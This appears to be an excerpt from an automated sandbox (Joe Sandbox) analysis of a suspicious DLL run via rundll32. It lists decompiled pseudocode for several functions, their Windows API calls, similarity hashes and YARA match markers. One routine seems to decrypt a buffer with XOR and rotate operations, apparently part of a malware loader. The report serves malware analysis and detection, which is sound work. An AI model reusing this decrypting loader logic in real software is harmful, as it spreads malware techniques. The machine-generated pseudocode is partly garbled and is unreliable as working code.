                                                  Similarity
                                                  • API ID: AllocErrorLastVirtual
                                                  • String ID:
                                                  • API String ID: 497505419-0
                                                  • Opcode ID: 3116e978e010c94e2828d6de0d0572b4475f56a25a6fe7c95f705bb81a5ed5c2
                                                  • Instruction ID: ea269a028a1356371e25c0c3e3ed4ebc626b70e9dbdbba68532a1a5be3ab6bd4
                                                  • Opcode Fuzzy Hash: 3116e978e010c94e2828d6de0d0572b4475f56a25a6fe7c95f705bb81a5ed5c2
                                                  • Instruction Fuzzy Hash: C831047270464886F697DF19A8007EC7760F74DBD4F28C224FE4A47799CE28CA4B8B00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00000001800014B4 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 57memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 30%
                                                  			E000000011800014B4(unsigned long long __rax, long long __rbx, void* __rcx, signed short* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
				signed int _t18;
				unsigned long long _t40;
				signed long long _t44;
				void* _t48;
				intOrPtr* _t53;
				void* _t57;
				char* _t65;

				_t40 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t18 =  *__rdx & 0x0000ffff;
				_t57 = __rcx;
				if (_t18 == 0) goto 0x800014f1;
				 *(__rcx - __rdx + __rdx) = _t18;
				_t44 = __rbx + 1;
				if ((__rdx[1] & 0x0000ffff) != 0) goto 0x800014dd;
				_t48 = __r8;
				E00000001180001604(__rax, _t44, __r8, __rcx);
				_t53 =  !=  ? _t40 : "error";
				if ( *_t53 == 0) goto 0x80001543;
				_t65 = "0123456789ABCDEF";
				 *((short*)(_t57 + _t44 * 2)) =  *((char*)((_t40 >> 4) + _t65));
				 *((short*)(_t57 + 2 + _t44 * 2)) =  *((char*)(_t48 + _t65));
				if ( *((intOrPtr*)(_t53 + 1)) != 0) goto 0x80001517;
				 *((short*)(_t57 + (_t44 + 2) * 2)) = 0;
				if (_t40 == 0) goto 0x80001560;
				GetProcessHeap();
				return HeapFree(??, ??, ??);
			}










                                                  0x1800014b4
                                                  0x1800014b4
                                                  0x1800014b9
                                                  0x1800014be
                                                  0x1800014c8
                                                  0x1800014cd
                                                  0x1800014d5
                                                  0x1800014dd
                                                  0x1800014e2
                                                  0x1800014ef
                                                  0x1800014f1
                                                  0x1800014f4
                                                  0x180001506
                                                  0x18000150e
                                                  0x180001510
                                                  0x18000152b
                                                  0x180001534
                                                  0x180001541
                                                  0x180001543
                                                  0x18000154a
                                                  0x18000154c
                                                  0x180001577

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$FreeProcess
                                                  • String ID: 0123456789ABCDEF$error
                                                  • API String ID: 3859560861-2801526254
                                                  • Opcode ID: d159536ed359fb2978bdeb3d8efd08e518805a4ac9e5b7cae6a2cf1678e6ed82
                                                  • Instruction ID: 4d37b50957ecb40c11f1bab49c43fdea11f128f3efa604fbc2492665c83ce860
                                                  • Opcode Fuzzy Hash: d159536ed359fb2978bdeb3d8efd08e518805a4ac9e5b7cae6a2cf1678e6ed82
                                                  • Instruction Fuzzy Hash: 1011B1A6600BC8C5EB92DF51A8103EA77B0EB4CBC5F489165FBC947765EE2CC659C300
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180001604 Relevance: 6.0, APIs: 4, Instructions: 34memorystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocByteCharMultiProcessWidelstrlen
                                                  • String ID:
                                                  • API String ID: 1639946962-0
                                                  • Opcode ID: 810253122467eff869761211845e8c14e9d73cd99dc7960972147d504be8e0c4
                                                  • Instruction ID: f749ba44300ed36f526ff8a462cf25b5487c4517239f32e4156c9a8f9373c5fc
                                                  • Opcode Fuzzy Hash: 810253122467eff869761211845e8c14e9d73cd99dc7960972147d504be8e0c4
                                                  • Instruction Fuzzy Hash: A101A772505B8982E791CF11F80439AB7A1F78CBD4F088224EB5917798DF3CC6088744
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180001760 Relevance: 5.1, APIs: 4, Instructions: 121memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 274b2cb4633cd05ef90222c88809d4ff0835cfaf70b1ef21e101df444750c1f5
                                                  • Instruction ID: 9806a40fc76e7d2c0d57f827516f40d69531b25457ee03bdfc89f6e60ed63076
                                                  • Opcode Fuzzy Hash: 274b2cb4633cd05ef90222c88809d4ff0835cfaf70b1ef21e101df444750c1f5
                                                  • Instruction Fuzzy Hash: 99518B72A00B548AEB56CF21E5007DC77B1F70CBE9F088215EE6927B88DF34D6468310
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0000000180002268 Relevance: 5.1, APIs: 4, Instructions: 117memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 27%
                                                  			E00000001180002268(void* __ecx, void* __edx, long long __rbx, void* __rcx, signed long long __rdx, long long __rdi, long long __rsi, void* __r8, void* __r11, long long __r14) {
				void* _v8;
				char _v872;
				signed int _v904;
				signed int _v912;
				long long _v920;
				long long _v928;
				long long _v936;
				void* __rbp;
				void* _t101;
				long long _t104;
				intOrPtr _t109;
				void* _t112;
				signed long long _t115;
				long long _t118;
				long long _t119;
				signed int _t120;
				signed long long _t121;
				long long _t124;
				intOrPtr _t125;
				void* _t128;
				void* _t131;
				void* _t132;
				signed long long _t135;

				_t115 = __rdx;
				_t101 = _t131;
				 *((long long*)(_t101 + 8)) = __rbx;
				 *((long long*)(_t101 + 0x10)) = __rsi;
				 *((long long*)(_t101 + 0x18)) = __rdi;
				 *((long long*)(_t101 + 0x20)) = __r14;
				_t132 = _t131 - 0x3c0;
				r14d =  *((intOrPtr*)(__rcx + 2));
				_t124 = __rcx + 0x2c6;
				E00000001180001F2C(__rbx, __rcx, __rdx, __rdi, _t124, _t101 - 0x2c8, __r8,  &_v872);
				_v912 = _v912 & 0x00000000;
				_t118 = __r14 - 0x10;
				_t112 = _t118 + _t124;
				_v936 = _t124;
				_v920 = _t118;
				_v928 = _t124;
				if (_t112 == 0) goto 0x800022e4;
				asm("movups xmm0, [ecx]");
				_t104 = _t112 - __r14 - _t124;
				asm("movups [esp+eax+0x50], xmm0");
				_t119 = _v920;
				_t125 = _v936;
				r10d = 0;
				if (_t125 == 0) goto 0x800023f3;
				if (_t119 - 4 < 0) goto 0x800023f3;
				_t120 = _t119 + 0xfffffffc;
				_v920 = _t120;
				if (_v928 != 0) goto 0x8000233e;
				if (_t120 == 0) goto 0x800023f3;
				GetProcessHeap();
				_t135 = _t120 + 1;
				HeapAlloc(_t128, ??);
				_v928 = _t104;
				if (_t104 == 0) goto 0x800023f3;
				r10d = 1;
				r9d =  *(_t120 + _t125);
				r11d = 0;
				r9d = r9d ^ _v904;
				_v912 = _t120;
				if (_t120 == 0) goto 0x800023b6;
				r8d = _t115 + 1;
				r8d = r8d & 0x00000003;
				 *(__r11 + _t104) =  *((intOrPtr*)(_t132 + 0x40 + _t135 * 4)) +  *((intOrPtr*)(_t132 + 0x40 + _t115 * 4)) ^  *(__r11 + _t125);
				asm("ror eax, cl");
				 *((intOrPtr*)(_t132 + 0x40 + _t115 * 4)) =  *((intOrPtr*)(_t132 + 0x40 + _t115 * 4)) + 1;
				asm("ror eax, cl");
				 *((intOrPtr*)(_t132 + 0x40 + _t135 * 4)) =  *((intOrPtr*)(_t132 + 0x40 + _t135 * 4)) + 1;
				_t109 = _v928;
				if (__r11 + 1 - _v920 >= 0) goto 0x800023b1;
				goto 0x80002354;
				_t121 = _v912;
				if (_t121 == 0) goto 0x800023d0;
				asm("rol ecx, 0x3");
				if (_t115 + 1 - _t121 < 0) goto 0x800023bf;
				if (r9d == 0 + ( *(_t115 + _t109) & 0x000000ff)) goto 0x80002415;
				if (r10d == 0) goto 0x800023f3;
				if (_t109 == 0) goto 0x800023f3;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				return 0x4000000;
			}


























                                                  0x180002268
                                                  0x180002268
                                                  0x18000226b
                                                  0x18000226f
                                                  0x180002273
                                                  0x180002277
                                                  0x180002283
                                                  0x18000228a
                                                  0x180002293
                                                  0x18000229a
                                                  0x18000229f
                                                  0x1800022a5
                                                  0x1800022a9
                                                  0x1800022ad
                                                  0x1800022b2
                                                  0x1800022ba
                                                  0x1800022c2
                                                  0x1800022c4
                                                  0x1800022cd
                                                  0x1800022d0
                                                  0x1800022d5
                                                  0x1800022df
                                                  0x1800022e4
                                                  0x1800022ea
                                                  0x1800022f4
                                                  0x1800022fa
                                                  0x1800022fe
                                                  0x180002306
                                                  0x18000230b
                                                  0x180002311
                                                  0x18000231a
                                                  0x180002321
                                                  0x180002327
                                                  0x180002332
                                                  0x180002338
                                                  0x18000233e
                                                  0x180002342
                                                  0x180002345
                                                  0x18000234a
                                                  0x180002352
                                                  0x180002358
                                                  0x18000235f
                                                  0x180002375
                                                  0x180002383
                                                  0x180002387
                                                  0x180002395
                                                  0x180002399
                                                  0x18000239e
                                                  0x1800023a8
                                                  0x1800023af
                                                  0x1800023b1
                                                  0x1800023bd
                                                  0x1800023c8
                                                  0x1800023ce
                                                  0x1800023d3
                                                  0x1800023d8
                                                  0x1800023dd
                                                  0x1800023df
                                                  0x1800023ed
                                                  0x180002414

                                                  APIs
                                                    • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F5B
                                                    • Part of subcall function 0000000180001F2C: SHGetFolderPathA.SHELL32 ref: 0000000180001F79
                                                    • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001F8D
                                                    • Part of subcall function 0000000180001F2C: lstrcatA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FA8
                                                    • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FD4
                                                    • Part of subcall function 0000000180001F2C: lstrcpyA.KERNEL32(?,?,?,?,?,000000018000229F), ref: 0000000180001FEE
                                                  • GetProcessHeap.KERNEL32 ref: 0000000180002311
                                                  • HeapAlloc.KERNEL32 ref: 0000000180002321
                                                  • GetProcessHeap.KERNEL32 ref: 00000001800023DF
                                                  • HeapFree.KERNEL32 ref: 00000001800023ED
                                                    • Part of subcall function 0000000180002B5C: VirtualAlloc.KERNEL32 ref: 0000000180002B85
                                                    • Part of subcall function 0000000180002B5C: GetLastError.KERNEL32 ref: 0000000180002B95
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                  • Associated: 00000005.00000002.946703468.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946741343.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.946746318.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heaplstrcpy$AllocProcess$ErrorFolderFreeLastPathVirtuallstrcat
                                                  • String ID:
                                                  • API String ID: 2105669568-0
                                                  • Opcode ID: b024e13aee0004cfa310f23d42346dd6e876068c5b8baeb37970762a8c3175c9
                                                  • Instruction ID: 886363a85c85b8c133f3364473ad3588f921292bdc20cd3c907036740f45d7b5
                                                  • Opcode Fuzzy Hash: b024e13aee0004cfa310f23d42346dd6e876068c5b8baeb37970762a8c3175c9
                                                  • Instruction Fuzzy Hash: 3351D172614B8486EA96CF14E10479DB3A1F78CBC4F188221EB9957B88DF39D74AC700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%